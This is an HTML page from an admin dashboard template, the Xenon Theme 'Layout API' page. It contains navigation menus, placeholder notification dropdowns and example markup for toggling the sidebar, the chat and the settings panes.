<div class="col-md-8 link-blocks-env">
<div class="links-block left-sep">
<h4>
<span>Notifications</span>
</h4>
<ul class="list-unstyled">
<li>
<input type="checkbox" class="cbr cbr-primary" checked="checked" id="sp-chk1" />
<label for="sp-chk1">Messages</label>
</li>
<li>
<input type="checkbox" class="cbr cbr-primary" checked="checked" id="sp-chk2" />
<label for="sp-chk2">Events</label>
</li>
<li>
<input type="checkbox" class="cbr cbr-primary" checked="checked" id="sp-chk3" />
<label for="sp-chk3">Updates</label>
</li>
<li>
<input type="checkbox" class="cbr cbr-primary" checked="checked" id="sp-chk4" />
<label for="sp-chk4">Server Uptime</label>
</li>
</ul>
</div>
<div class="links-block left-sep">
<h4>
<a href="#">
<span>Help Desk</span>
</a>
</h4>
<ul class="list-unstyled">
<li>
<a href="#">
<i class="fa-angle-right"></i>
Support Center
</a>
</li>
<li>
<a href="#">
<i class="fa-angle-right"></i>
Submit a Ticket
</a>
</li>
<li>
<a href="#">
<i class="fa-angle-right"></i>
Domains Protocol
</a>
</li>
<li>
<a href="#">
<i class="fa-angle-right"></i>
Terms of Service
</a>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
<nav class="navbar horizontal-menu navbar-fixed-top"><!-- set fixed position by adding class "navbar-fixed-top" -->
<div class="navbar-inner">
<!-- Navbar Brand -->
<div class="navbar-brand">
<a href="dashboard-1.html" class="logo">
<img src="assets/images/logo-white-bg@2x.png" width="80" alt="" class="hidden-xs" />
<img src="assets/images/logo@2x.png" width="80" alt="" class="visible-xs" />
</a>
<a href="#" data-toggle="settings-pane" data-animate="true">
<i class="linecons-cog"></i>
</a>
</div>
<!-- Mobile Toggles Links -->
<div class="nav navbar-mobile">
<!-- This will toggle the mobile menu and will be visible only on mobile devices -->
<div class="mobile-menu-toggle">
<!-- This will open the popup with user profile settings, you can use for any purpose, just be creative -->
<a href="#" data-toggle="settings-pane" data-animate="true">
<i class="linecons-cog"></i>
</a>
<a href="#" data-toggle="user-info-menu-horizontal">
<i class="fa-bell-o"></i>
<span class="badge badge-success">7</span>
</a>
<!-- data-toggle="mobile-menu-horizontal" will show horizontal menu links only -->
<!-- data-toggle="mobile-menu" will show sidebar menu links only -->
<!-- data-toggle="mobile-menu-both" will show sidebar and horizontal menu links -->
<a href="#" data-toggle="mobile-menu-horizontal">
<i class="fa-bars"></i>
</a>
</div>
</div>
<div class="navbar-mobile-clear"></div>
<!-- main menu -->
<ul class="navbar-nav">
<li>
<a href="dashboard-1.html">
<i class="linecons-cog"></i>
<span class="title">Dashboard</span>
</a>
<ul>
<li>
<a href="dashboard-1.html">
<span class="title">Dashboard 1</span>
</a>
</li>
<li>
<a href="dashboard-2.html">
<span class="title">Dashboard 2</span>
</a>
</li>
<li>
<a href="dashboard-3.html">
<span class="title">Dashboard 3</span>
</a>
</li>
<li>
<a href="dashboard-4.html">
<span class="title">Dashboard 4</span>
</a>
</li>
<li>
<a href="skin-generator.html">
<span class="title">Skin Generator</span>
</a>
</li>
</ul>
</li>
<li class="opened active">
<a href="layout-variants.html">
<i class="linecons-desktop"></i>
<span class="title">Layouts</span>
</a>
<ul>
<li>
<a href="layout-variants.html">
<span class="title">Layout Variants & API</span>
</a>
</li>
<li>
<a href="layout-collapsed-sidebar.html">
<span class="title">Collapsed Sidebar</span>
</a>
</li>
<li>
<a href="layout-static-sidebar.html">
<span class="title">Static Sidebar</span>
</a>
</li>
<li>
<a href="layout-horizontal-menu.html">
<span class="title">Horizontal Menu</span>
</a>
</li>
<li>
<a href="layout-horizontal-plus-sidebar.html">
<span class="title">Horizontal & Sidebar Menu</span>
</a>
</li>
<li>
<a href="layout-horizontal-menu-click-to-open-subs.html">
<span class="title">Horizontal Open On Click</span>
</a>
</li>
<li>
<a href="layout-horizontal-menu-min.html">
<span class="title">Horizontal Menu Minimal</span>
</a>
</li>
<li>
<a href="layout-right-sidebar.html">
<span class="title">Right Sidebar</span>
</a>
</li>
<li>
<a href="layout-chat-open.html">
<span class="title">Chat Open</span>
</a>
</li>
<li class="active">
<a href="layout-horizontal-sidebar-menu-collapsed-right.html">
<span class="title">Both Menus & Collapsed</span>
</a>
</li>
<li>
<a href="layout-boxed.html">
<span class="title">Boxed Layout</span>
</a>
</li>
<li>
<a href="layout-boxed-horizontal-menu.html">
<span class="title">Boxed & Horizontal Menu</span>
</a>
</li>
</ul>
</li>
<li>
<a href="ui-panels.html">
<i class="linecons-note"></i>
<span class="title">UI Elements</span>
</a>
<ul>
<li>
<a href="ui-panels.html">
<span class="title">Panels</span>
</a>
</li>
<li>
<a href="ui-buttons.html">
<span class="title">Buttons</span>
</a>
</li>
<li>
<a href="ui-tabs-accordions.html">
<span class="title">Tabs & Accordions</span>
</a>
</li>
<li>
<a href="ui-modals.html">
<span class="title">Modals</span>
</a>
</li>
<li>
<a href="ui-breadcrumbs.html">
<span class="title">Breadcrumbs</span>
</a>
</li>
<li>
<a href="ui-blockquotes.html">
<span class="title">Blockquotes</span>
</a>
</li>
<li>
<a href="ui-progressbars.html">
<span class="title">Progress Bars</span>
</a>
</li>
<li>
<a href="ui-navbars.html">
<span class="title">Navbars</span>
</a>
</li>
<li>
<a href="ui-alerts.html">
<span class="title">Alerts</span>
</a>
</li>
<li>
<a href="ui-pagination.html">
<span class="title">Pagination</span>
</a>
</li>
<li>
<a href="ui-typography.html">
<span class="title">Typography</span>
</a>
</li>
<li>
<a href="ui-other-elements.html">
<span class="title">Other Elements</span>
</a>
</li>
</ul>
</li>
<li>
<a href="forms-native.html">
<i class="linecons-params"></i>
<span class="title">Forms</span>
</a>
<ul>
<li>
<a href="forms-native.html">
<span class="title">Native Elements</span>
</a>
</li>
<li>
<a href="forms-advanced.html">
<span class="title">Advanced Plugins</span>
</a>
</li>
<li>
<a href="forms-wizard.html">
<span class="title">Form Wizard</span>
</a>
</li>
<li>
<a href="forms-validation.html">
<span class="title">Form Validation</span>
</a>
</li>
<li>
<a href="forms-input-masks.html">
<span class="title">Input Masks</span>
</a>
</li>
<li>
<a href="forms-file-upload.html">
<span class="title">File Upload</span>
</a>
</li>
<li>
<a href="forms-editors.html">
<span class="title">Editors</span>
</a>
</li>
<li>
<a href="forms-sliders.html">
<span class="title">Sliders</span>
</a>
</li>
</ul>
</li>
<li>
<a href="">
<i class="linecons-diamond"></i>
<span class="title">Other</span>
</a>
<ul>
<li>
<a href="ui-widgets.html">
<i class="linecons-star"></i>
<span class="title">Widgets</span>
</a>
</li>
<li>
<a href="mailbox-main.html">
<i class="linecons-mail"></i>
<span class="title">Mailbox</span>
<span class="label label-success pull-right">5</span>
</a>
<ul>
<li>
<a href="mailbox-main.html">
<span class="title">Inbox</span>
</a>
</li>
<li>
<a href="mailbox-compose.html">
<span class="title">Compose Message</span>
</a>
</li>
<li>
<a href="mailbox-message.html">
<span class="title">View Message</span>
</a>
</li>
</ul>
</li>
<li>
<a href="tables-basic.html">
<i class="linecons-database"></i>
<span class="title">Tables</span>
</a>
<ul>
<li>
<a href="tables-basic.html">
<span class="title">Basic Tables</span>
</a>
</li>
<li>
<a href="tables-responsive.html">
<span class="title">Responsive Table</span>
</a>
</li>
<li>
<a href="tables-datatables.html">
<span class="title">Data Tables</span>
</a>
</li>
</ul>
</li>
<li>
<a href="extra-gallery.html">
<i class="linecons-beaker"></i>
<span class="title">Extra</span>
<span class="label label-purple pull-right hidden-collapsed">New Items</span>
</a>
<ul>
<li>
<a href="extra-icons-fontawesome.html">
<span class="title">Icons</span>
<span class="label label-warning pull-right">4</span>
</a>
<ul>
<li>
<a href="extra-icons-fontawesome.html">
<span class="title">Font Awesome</span>
</a>
</li>
<li>
<a href="extra-icons-linecons.html">
<span class="title">Linecons</span>
</a>
</li>
<li>
<a href="extra-icons-elusive.html">
<span class="title">Elusive</span>
</a>
</li>
<li>
<a href="extra-icons-meteocons.html">
<span class="title">Meteocons</span>
</a>
</li>
</ul>
</li>
<li>
<a href="extra-maps-google.html">
<span class="title">Maps</span>
</a>
<ul>
<li>
<a href="extra-maps-google.html">
<span class="title">Google Maps</span>
</a>
</li>
<li>
<a href="extra-maps-advanced.html">
<span class="title">Advanced Map</span>
</a>
</li>
<li>
<a href="extra-maps-vector.html">
<span class="title">Vector Map</span>
</a>
</li>
</ul>
</li>
<li>
<a href="extra-gallery.html">
<span class="title">Gallery</span>
</a>
</li>
<li>
<a href="extra-calendar.html">
<span class="title">Calendar</span>
</a>
</li>
<li>
<a href="extra-profile.html">
<span class="title">Profile</span>
</a>
</li>
<li>
<a href="extra-login.html">
<span class="title">Login</span>
</a>
</li>
<li>
<a href="extra-lockscreen.html">
<span class="title">Lockscreen</span>
</a>
</li>
<li>
<a href="extra-login-light.html">
<span class="title">Login Light</span>
</a>
</li>
<li>
<a href="extra-timeline.html">
<span class="title">Timeline</span>
</a>
</li>
<li>
<a href="extra-timeline-center.html">
<span class="title">Timeline Centerd</span>
</a>
</li>
<li>
<a href="extra-notes.html">
<span class="title">Notes</span>
</a>
</li>
<li>
<a href="extra-image-crop.html">
<span class="title">Image Crop</span>
</a>
</li>
<li>
<a href="extra-portlets.html">
<span class="title">Portlets</span>
</a>
</li>
<li>
<a href="blank-sidebar.html">
<span class="title">Blank Page</span>
</a>
</li>
<li>
<a href="extra-search.html">
<span class="title">Search</span>
</a>
</li>
<li>
<a href="extra-invoice.html">
<span class="title">Invoice</span>
</a>
</li>
<li>
<a href="extra-not-found.html">
<span class="title">404 Page</span>
</a>
</li>
<li>
<a href="extra-tocify.html">
<span class="title">Tocify</span>
</a>
</li>
<li>
<a href="extra-loader.html">
<span class="title">Loading Progress</span>
</a>
</li>
<li>
<a href="extra-page-loading-ol.html">
<span class="title">Page Loading Overlay</span>
</a>
</li>
<li>
<a href="extra-notifications.html">
<span class="title">Notifications</span>
</a>
</li>
<li>
<a href="extra-nestable-lists.html">
<span class="title">Nestable Lists</span>
</a>
</li>
<li>
<a href="extra-scrollable.html">
<span class="title">Scrollable</span>
</a>
</li>
</ul>
</li>
<li>
<a href="charts-main.html">
<i class="linecons-globe"></i>
<span class="title">Charts</span>
</a>
<ul>
<li>
<a href="charts-main.html">
<span class="title">Chart Variants</span>
</a>
</li>
<li>
<a href="charts-range.html">
<span class="title">Range Selector</span>
</a>
</li>
<li>
<a href="charts-sparklines.html">
<span class="title">Sparklines</span>
</a>
</li>
<li>
<a href="charts-map.html">
<span class="title">Map Charts</span>
</a>
</li>
<li>
<a href="charts-gauges.html">
<span class="title">Circular Gauges</span>
</a>
</li>
<li>
<a href="charts-bar-gauges.html">
<span class="title">Bar Gauges</span>
</a>
</li>
</ul>
</li>
<li>
<a href="#">
<i class="linecons-cloud"></i>
<span class="title">Menu Levels</span>
</a>
<ul>
<li>
<a href="#">
<i class="entypo-flow-line"></i>
<span class="title">Menu Level 1.1</span>
</a>
<ul>
<li>
<a href="#">
<i class="entypo-flow-parallel"></i>
<span class="title">Menu Level 2.1</span>
</a>
</li>
<li>
<a href="#">
<i class="entypo-flow-parallel"></i>
<span class="title">Menu Level 2.2</span>
</a>
<ul>
<li>
<a href="#">
<i class="entypo-flow-cascade"></i>
<span class="title">Menu Level 3.1</span>
</a>
</li>
<li>
<a href="#">
<i class="entypo-flow-cascade"></i>
<span class="title">Menu Level 3.2</span>
</a>
<ul>
<li>
<a href="#">
<i class="entypo-flow-branch"></i>
<span class="title">Menu Level 4.1</span>
</a>
</li>
</ul>
</li>
</ul>
</li>
<li>
<a href="#">
<i class="entypo-flow-parallel"></i>
<span class="title">Menu Level 2.3</span>
</a>
</li>
</ul>
</li>
<li>
<a href="#">
<i class="entypo-flow-line"></i>
<span class="title">Menu Level 1.2</span>
</a>
</li>
<li>
<a href="#">
<i class="entypo-flow-line"></i>
<span class="title">Menu Level 1.3</span>
</a>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<!-- notifications and other links -->
<ul class="nav nav-userinfo navbar-right">
<li class="search-form"><!-- You can add "always-visible" to show make the search input visible -->
<form method="get" action="extra-search.html">
<input type="text" name="s" class="form-control search-field" placeholder="Type to search..." />
<button type="submit" class="btn btn-link">
<i class="linecons-search"></i>
</button>
</form>
</li>
<li class="dropdown xs-left">
<a href="#" data-toggle="dropdown" class="notification-icon">
<i class="fa-envelope-o"></i>
<span class="badge badge-green">15</span>
</a>
<ul class="dropdown-menu messages">
<li>
<ul class="dropdown-menu-list list-unstyled ps-scrollbar">
<li class="active"><!-- "active" class means message is unread -->
<a href="#">
<span class="line">
<strong>Luc Chartier</strong>
<span class="light small">- yesterday</span>
</span>
<span class="line desc small">
This ain’t our first item, it is the best of the rest.
</span>
</a>
</li>
<li class="active">
<a href="#">
<span class="line">
<strong>Salma Nyberg</strong>
<span class="light small">- 2 days ago</span>
</span>
<span class="line desc small">
Oh he decisively impression attachment friendship so if everything.
</span>
</a>
</li>
<li>
<a href="#">
<span class="line">
Hayden Cartwright
<span class="light small">- a week ago</span>
</span>
<span class="line desc small">
Whose her enjoy chief new young. Felicity if ye required likewise so doubtful.
</span>
</a>
</li>
<li>
<a href="#">
<span class="line">
Sandra Eberhardt
<span class="light small">- 16 days ago</span>
</span>
<span class="line desc small">
On so attention necessary at by provision otherwise existence direction.
</span>
</a>
</li>
<!-- Repeated -->
<li class="active"><!-- "active" class means message is unread -->
<a href="#">
<span class="line">
<strong>Luc Chartier</strong>
<span class="light small">- yesterday</span>
</span>
<span class="line desc small">
This ain’t our first item, it is the best of the rest.
</span>
</a>
</li>
<li class="active">
<a href="#">
<span class="line">
<strong>Salma Nyberg</strong>
<span class="light small">- 2 days ago</span>
</span>
<span class="line desc small">
Oh he decisively impression attachment friendship so if everything.
</span>
</a>
</li>
<li>
<a href="#">
<span class="line">
Hayden Cartwright
<span class="light small">- a week ago</span>
</span>
<span class="line desc small">
Whose her enjoy chief new young. Felicity if ye required likewise so doubtful.
</span>
</a>
</li>
<li>
<a href="#">
<span class="line">
Sandra Eberhardt
<span class="light small">- 16 days ago</span>
</span>
<span class="line desc small">
On so attention necessary at by provision otherwise existence direction.
</span>
</a>
</li>
</ul>
</li>
<li class="external">
<a href="blank-sidebar.html">
<span>All Messages</span>
<i class="fa-link-ext"></i>
</a>
</li>
</ul>
</li>
<li class="dropdown xs-left">
<a href="#" data-toggle="dropdown" class="notification-icon notification-icon-messages">
<i class="fa-bell-o"></i>
<span class="badge badge-purple">7</span>
</a>
<ul class="dropdown-menu notifications">
<li class="top">
<p class="small">
<a href="#" class="pull-right">Mark all Read</a>
You have <strong>3</strong> new notifications.
</p>
</li>
<li>
<ul class="dropdown-menu-list list-unstyled ps-scrollbar">
<li class="active notification-success">
<a href="#">
<i class="fa-user"></i>
<span class="line">
<strong>New user registered</strong>
</span>
<span class="line small time">
30 seconds ago
</span>
</a>
</li>
<li class="active notification-secondary">
<a href="#">
<i class="fa-lock"></i>
<span class="line">
<strong>Privacy settings have been changed</strong>
</span>
<span class="line small time">
3 hours ago
</span>
</a>
</li>
<li class="notification-primary">
<a href="#">
<i class="fa-thumbs-up"></i>
<span class="line">
<strong>Someone special liked this</strong>
</span>
<span class="line small time">
2 minutes ago
</span>
</a>
</li>
<li class="notification-danger">
<a href="#">
<i class="fa-calendar"></i>
<span class="line">
John cancelled the event
</span>
<span class="line small time">
9 hours ago
</span>
</a>
</li>
<li class="notification-info">
<a href="#">
<i class="fa-database"></i>
<span class="line">
The server is status is stable
</span>
<span class="line small time">
yesterday at 10:30am
</span>
</a>
</li>
<li class="notification-warning">
<a href="#">
<i class="fa-envelope-o"></i>
<span class="line">
New comments waiting approval
</span>
<span class="line small time">
last week
</span>
</a>
</li>
</ul>
</li>
<li class="external">
<a href="#">
<span>View all notifications</span>
<i class="fa-link-ext"></i>
</a>
</li>
</ul>
</li>
<li class="dropdown user-profile">
<a href="#" data-toggle="dropdown">
<img src="assets/images/user-1.png" alt="user-image" class="img-circle img-inline userpic-32" width="28" />
<span>
Arlind Nushi
<i class="fa-angle-down"></i>
</span>
</a>
<ul class="dropdown-menu user-profile-menu list-unstyled">
<li>
<a href="#edit-profile">
<i class="fa-edit"></i>
New Post
</a>
</li>
<li>
<a href="#settings">
<i class="fa-wrench"></i>
Settings
</a>
</li>
<li>
<a href="#profile">
<i class="fa-user"></i>
Profile
</a>
</li>
<li>
<a href="#help">
<i class="fa-info"></i>
Help
</a>
</li>
<li class="last">
<a href="extra-lockscreen.html">
<i class="fa-lock"></i>
Logout
</a>
</li>
</ul>
</li>
<li>
<a href="#" data-toggle="chat">
<i class="fa-comments-o"></i>
</a>
</li>
</ul>
</div>
</nav>
<div class="page-container"><!-- add class "sidebar-collapsed" to close sidebar by default, "chat-visible" to make chat appear always -->
<!-- Add "fixed" class to make the sidebar fixed always to the browser viewport. -->
<!-- Adding class "toggle-others" will keep only one menu item open at a time. -->
<!-- Adding class "collapsed" collapse sidebar root elements and show only icons. -->
<div class="sidebar-menu toggle-others collapsed">
<div class="sidebar-menu-inner">
<ul id="main-menu" class="main-menu">
<!-- add class "multiple-expanded" to allow multiple submenus to open -->
<!-- class "auto-inherit-active-class" will automatically add "active" class for parent elements who are marked already with class "active" -->
<li>
<a href="dashboard-1.html">
<i class="linecons-cog"></i>
<span class="title">Dashboard</span>
</a>
<ul>
<li>
<a href="dashboard-1.html">
<span class="title">Dashboard 1</span>
</a>
</li>
<li>
<a href="dashboard-2.html">
<span class="title">Dashboard 2</span>
</a>
</li>
<li>
<a href="dashboard-3.html">
<span class="title">Dashboard 3</span>
</a>
</li>
<li>
<a href="dashboard-4.html">
<span class="title">Dashboard 4</span>
</a>
</li>
<li>
<a href="skin-generator.html">
<span class="title">Skin Generator</span>
</a>
</li>
</ul>
</li>
<li class="opened active">
<a href="layout-variants.html">
<i class="linecons-desktop"></i>
<span class="title">Layouts</span>
</a>
<ul>
<li>
<a href="layout-variants.html">
<span class="title">Layout Variants & API</span>
</a>
</li>
<li>
<a href="layout-collapsed-sidebar.html">
<span class="title">Collapsed Sidebar</span>
</a>
</li>
<li>
<a href="layout-static-sidebar.html">
<span class="title">Static Sidebar</span>
</a>
</li>
<li>
<a href="layout-horizontal-menu.html">
<span class="title">Horizontal Menu</span>
</a>
</li>
<li>
<a href="layout-horizontal-plus-sidebar.html">
<span class="title">Horizontal & Sidebar Menu</span>
</a>
</li>
<li>
<a href="layout-horizontal-menu-click-to-open-subs.html">
<span class="title">Horizontal Open On Click</span>
</a>
</li>
<li>
<a href="layout-horizontal-menu-min.html">
<span class="title">Horizontal Menu Minimal</span>
</a>
</li>
<li>
<a href="layout-right-sidebar.html">
<span class="title">Right Sidebar</span>
</a>
</li>
<li>
<a href="layout-chat-open.html">
<span class="title">Chat Open</span>
</a>
</li>
<li class="active">
<a href="layout-horizontal-sidebar-menu-collapsed-right.html">
<span class="title">Both Menus & Collapsed</span>
</a>
</li>
<li>
<a href="layout-boxed.html">
<span class="title">Boxed Layout</span>
</a>
</li>
<li>
<a href="layout-boxed-horizontal-menu.html">
<span class="title">Boxed & Horizontal Menu</span>
</a>
</li>
</ul>
</li>
<li>
<a href="ui-panels.html">
<i class="linecons-note"></i>
<span class="title">UI Elements</span>
</a>
<ul>
<li>
<a href="ui-panels.html">
<span class="title">Panels</span>
</a>
</li>
<li>
<a href="ui-buttons.html">
<span class="title">Buttons</span>
</a>
</li>
<li>
<a href="ui-tabs-accordions.html">
<span class="title">Tabs & Accordions</span>
</a>
</li>
<li>
<a href="ui-modals.html">
<span class="title">Modals</span>
</a>
</li>
<li>
<a href="ui-breadcrumbs.html">
<span class="title">Breadcrumbs</span>
</a>
</li>
<li>
<a href="ui-blockquotes.html">
<span class="title">Blockquotes</span>
</a>
</li>
<li>
<a href="ui-progressbars.html">
<span class="title">Progress Bars</span>
</a>
</li>
<li>
<a href="ui-navbars.html">
<span class="title">Navbars</span>
</a>
</li>
<li>
<a href="ui-alerts.html">
<span class="title">Alerts</span>
</a>
</li>
<li>
<a href="ui-pagination.html">
<span class="title">Pagination</span>
</a>
</li>
<li>
<a href="ui-typography.html">
<span class="title">Typography</span>
</a>
</li>
<li>
<a href="ui-other-elements.html">
<span class="title">Other Elements</span>
</a>
</li>
</ul>
</li>
<li>
<a href="ui-widgets.html">
<i class="linecons-star"></i>
<span class="title">Widgets</span>
</a>
</li>
<li>
<a href="mailbox-main.html">
<i class="linecons-mail"></i>
<span class="title">Mailbox</span>
<span class="label label-success pull-right">5</span>
</a>
<ul>
<li>
<a href="mailbox-main.html">
<span class="title">Inbox</span>
</a>
</li>
<li>
<a href="mailbox-compose.html">
<span class="title">Compose Message</span>
</a>
</li>
<li>
<a href="mailbox-message.html">
<span class="title">View Message</span>
</a>
</li>
</ul>
</li>
<li>
<a href="tables-basic.html">
<i class="linecons-database"></i>
<span class="title">Tables</span>
</a>
<ul>
<li>
<a href="tables-basic.html">
<span class="title">Basic Tables</span>
</a>
</li>
<li>
<a href="tables-responsive.html">
<span class="title">Responsive Table</span>
</a>
</li>
<li>
<a href="tables-datatables.html">
<span class="title">Data Tables</span>
</a>
</li>
</ul>
</li>
<li>
<a href="forms-native.html">
<i class="linecons-params"></i>
<span class="title">Forms</span>
</a>
<ul>
<li>
<a href="forms-native.html">
<span class="title">Native Elements</span>
</a>
</li>
<li>
<a href="forms-advanced.html">
<span class="title">Advanced Plugins</span>
</a>
</li>
<li>
<a href="forms-wizard.html">
<span class="title">Form Wizard</span>
</a>
</li>
<li>
<a href="forms-validation.html">
<span class="title">Form Validation</span>
</a>
</li>
<li>
<a href="forms-input-masks.html">
<span class="title">Input Masks</span>
</a>
</li>
<li>
<a href="forms-file-upload.html">
<span class="title">File Upload</span>
</a>
</li>
<li>
<a href="forms-editors.html">
<span class="title">Editors</span>
</a>
</li>
<li>
<a href="forms-sliders.html">
<span class="title">Sliders</span>
</a>
</li>
</ul>
</li>
<li>
<a href="extra-gallery.html">
<i class="linecons-beaker"></i>
<span class="title">Extra</span>
<span class="label label-purple pull-right hidden-collapsed">New Items</span>
</a>
<ul>
<li>
<a href="extra-icons-fontawesome.html">
<span class="title">Icons</span>
<span class="label label-warning pull-right">4</span>
</a>
<ul>
<li>
<a href="extra-icons-fontawesome.html">
<span class="title">Font Awesome</span>
</a>
</li>
<li>
<a href="extra-icons-linecons.html">
<span class="title">Linecons</span>
</a>
</li>
<li>
<a href="extra-icons-elusive.html">
<span class="title">Elusive</span>
</a>
</li>
<li>
<a href="extra-icons-meteocons.html">
<span class="title">Meteocons</span>
</a>
</li>
</ul>
</li>
<li>
<a href="extra-maps-google.html">
<span class="title">Maps</span>
</a>
<ul>
<li>
<a href="extra-maps-google.html">
<span class="title">Google Maps</span>
</a>
</li>
<li>
<a href="extra-maps-advanced.html">
<span class="title">Advanced Map</span>
</a>
</li>
<li>
<a href="extra-maps-vector.html">
<span class="title">Vector Map</span>
</a>
</li>
</ul>
</li>
<li>
<a href="extra-gallery.html">
<span class="title">Gallery</span>
</a>
</li>
<li>
<a href="extra-calendar.html">
<span class="title">Calendar</span>
</a>
</li>
<li>
<a href="extra-profile.html">
<span class="title">Profile</span>
</a>
</li>
<li>
<a href="extra-login.html">
<span class="title">Login</span>
</a>
</li>
<li>
<a href="extra-lockscreen.html">
<span class="title">Lockscreen</span>
</a>
</li>
<li>
<a href="extra-login-light.html">
<span class="title">Login Light</span>
</a>
</li>
<li>
<a href="extra-timeline.html">
<span class="title">Timeline</span>
</a>
</li>
<li>
<a href="extra-timeline-center.html">
<span class="title">Timeline Centerd</span>
</a>
</li>
<li>
<a href="extra-notes.html">
<span class="title">Notes</span>
</a>
</li>
<li>
<a href="extra-image-crop.html">
<span class="title">Image Crop</span>
</a>
</li>
<li>
<a href="extra-portlets.html">
<span class="title">Portlets</span>
</a>
</li>
<li>
<a href="blank-sidebar.html">
<span class="title">Blank Page</span>
</a>
</li>
<li>
<a href="extra-search.html">
<span class="title">Search</span>
</a>
</li>
<li>
<a href="extra-invoice.html">
<span class="title">Invoice</span>
</a>
</li>
<li>
<a href="extra-not-found.html">
<span class="title">404 Page</span>
</a>
</li>
<li>
<a href="extra-tocify.html">
<span class="title">Tocify</span>
</a>
</li>
<li>
<a href="extra-loader.html">
<span class="title">Loading Progress</span>
</a>
</li>
<li>
<a href="extra-page-loading-ol.html">
<span class="title">Page Loading Overlay</span>
</a>
</li>
<li>
<a href="extra-notifications.html">
<span class="title">Notifications</span>
</a>
</li>
<li>
<a href="extra-nestable-lists.html">
<span class="title">Nestable Lists</span>
</a>
</li>
<li>
<a href="extra-scrollable.html">
<span class="title">Scrollable</span>
</a>
</li>
</ul>
</li>
<li>
<a href="charts-main.html">
<i class="linecons-globe"></i>
<span class="title">Charts</span>
</a>
<ul>
<li>
<a href="charts-main.html">
<span class="title">Chart Variants</span>
</a>
</li>
<li>
<a href="charts-range.html">
<span class="title">Range Selector</span>
</a>
</li>
<li>
<a href="charts-sparklines.html">
<span class="title">Sparklines</span>
</a>
</li>
<li>
<a href="charts-map.html">
<span class="title">Map Charts</span>
</a>
</li>
<li>
<a href="charts-gauges.html">
<span class="title">Circular Gauges</span>
</a>
</li>
<li>
<a href="charts-bar-gauges.html">
<span class="title">Bar Gauges</span>
</a>
</li>
</ul>
</li>
<li>
<a href="#">
<i class="linecons-cloud"></i>
<span class="title">Menu Levels</span>
</a>
<ul>
<li>
<a href="#">
<i class="entypo-flow-line"></i>
<span class="title">Menu Level 1.1</span>
</a>
<ul>
<li>
<a href="#">
<i class="entypo-flow-parallel"></i>
<span class="title">Menu Level 2.1</span>
</a>
</li>
<li>
<a href="#">
<i class="entypo-flow-parallel"></i>
<span class="title">Menu Level 2.2</span>
</a>
<ul>
<li>
<a href="#">
<i class="entypo-flow-cascade"></i>
<span class="title">Menu Level 3.1</span>
</a>
</li>
<li>
<a href="#">
<i class="entypo-flow-cascade"></i>
<span class="title">Menu Level 3.2</span>
</a>
<ul>
<li>
<a href="#">
<i class="entypo-flow-branch"></i>
<span class="title">Menu Level 4.1</span>
</a>
</li>
</ul>
</li>
</ul>
</li>
<li>
<a href="#">
<i class="entypo-flow-parallel"></i>
<span class="title">Menu Level 2.3</span>
</a>
</li>
</ul>
</li>
<li>
<a href="#">
<i class="entypo-flow-line"></i>
<span class="title">Menu Level 1.2</span>
</a>
</li>
<li>
<a href="#">
<i class="entypo-flow-line"></i>
<span class="title">Menu Level 1.3</span>
</a>
</li>
</ul>
</li>
</ul>
</div>
</div>
<div class="main-content">
<script>
jQuery(document).ready(function($)
{
$('a[href="#layout-variants"]').on('click', function(ev)
{
ev.preventDefault();
var win = {top: $(window).scrollTop(), toTop: $("#layout-variants").offset().top - 15};
TweenLite.to(win, .3, {top: win.toTop, roundProps: ["top"], ease: Sine.easeInOut, onUpdate: function()
{
$(window).scrollTop(win.top);
}
});
});
});
</script>
<div class="jumbotron">
<h1>Layout API</h1>
<p>
Xenon Theme layout can be combined in many variants with sidebar and horizontal menu and offers a set of toggles (links) to manipulate with the theme layout. These features are enabled if you import <code>js/xenon-toggles.js</code> script in the document.
</p>
<br />
<a class="btn btn-primary btn-lg" href="#layout-variants" role="button">See Layout Variants</a>
</div>
<h3 id="layout-toggles">
Layout Toggles
<br />
<small>Links that will automatically collapse or expand side panels, chat or user settings pane.</small>
</h3>
<br />
<div class="row">
<div class="col-xs-3 text-muted">Link</div>
<div class="col-xs-9 text-muted">Code</div>
<div class="vspacer v3"></div>
<div class="col-sm-3">
<a href="#" class="btn btn-secondary btn-block btn-icon btn-icon-standalone text-left" data-toggle="sidebar">
<i class="fa-bars"></i>
<span>Toggle Sidebar</span>
</a>
</div>
<div class="col-sm-9">
<pre><a href="#" data-toggle="sidebar">Toggle Sidebar</a></pre>
</div>
<div class="clearfix"></div>
<div class="vspacer v4"></div>
<div class="col-sm-3">
<a href="#" class="btn btn-secondary btn-block btn-icon btn-icon-standalone text-left" data-toggle="chat">
<i class="fa-comment-o"></i>
<span>Toggle Chat</span>
</a>
</div>
<div class="col-sm-9">
<pre><a href="#" data-toggle="chat">Toggle Chat</a></pre>
</div>
<div class="clearfix"></div>
<div class="vspacer v4"></div>
<div class="col-sm-3">
<a href="#" class="btn btn-secondary btn-block btn-icon btn-icon-standalone text-left" data-toggle="settings-pane">
<i class="linecons-user"></i>
<span>Toggle Settings Pane</span>
</a>
</div>
<div class="col-sm-9">
<pre><a href="#" data-toggle="chat">Toggle Settings Pane</a></pre>
</div>
<div class="clearfix"></div>
<div class="vspacer v4"></div>
<div class="col-sm-3">
<a href="#" class="btn btn-secondary btn-block btn-icon btn-icon-standalone text-left" data-toggle="settings-pane" data-animate="true">
<i class="linecons-cog"></i>
<span>Settings Pane /w Animation</span>
</a>
</div>
<div class="col-sm-9">
<pre><a href="#" data-toggle="chat" data-animate="true">Toggle Settings Pane</a></pre>
</div>
<div class="clearfix"></div>
<div class="vspacer v4"></div>
<div class="col-sm-3">
<a href="#" class="btn btn-secondary btn-block btn-icon btn-icon-standalone text-left" rel="go-top">
<i class="fa-arrow-up"></i>
<span>Go to Top</span>
</a>
</div>
<div class="col-sm-9">
<pre><a href="#" rel="go-top">Go to Top</a></pre>
</div>
</div>
<br />
<br />
<h3 id="layout-variants">
Layout Variants
<br />
<small>9 different layout types with fixed or static scrolling panels</small>
</h3>
<div class="panel panel-default panel-headerless">
<div class="panel-body layout-variants">
<div class="row">
<div class="col-sm-4">
<div class="layout-variant">
<div class="layout-img">
<a href="layout-variants.html">
<img src="assets/images/layouts/layout-sidebar.png" />
</a>
</div>
<div class="layout-name">
<a href="layout-variants.html">Left Sidebar</a>
</div>
<ul class="layout-links">
<li>
<a href="layout-variants.html" class="">Fixed Sidebar</a>
</li>
<li>
<a href="layout-static-sidebar.html" class="">Static Sidebar</a>
</li>
<li>
<a href="layout-without-submenu-toggle.html" class="">Other Submenus Toggle Off</a>
</li>
</ul>
</div>
</div>
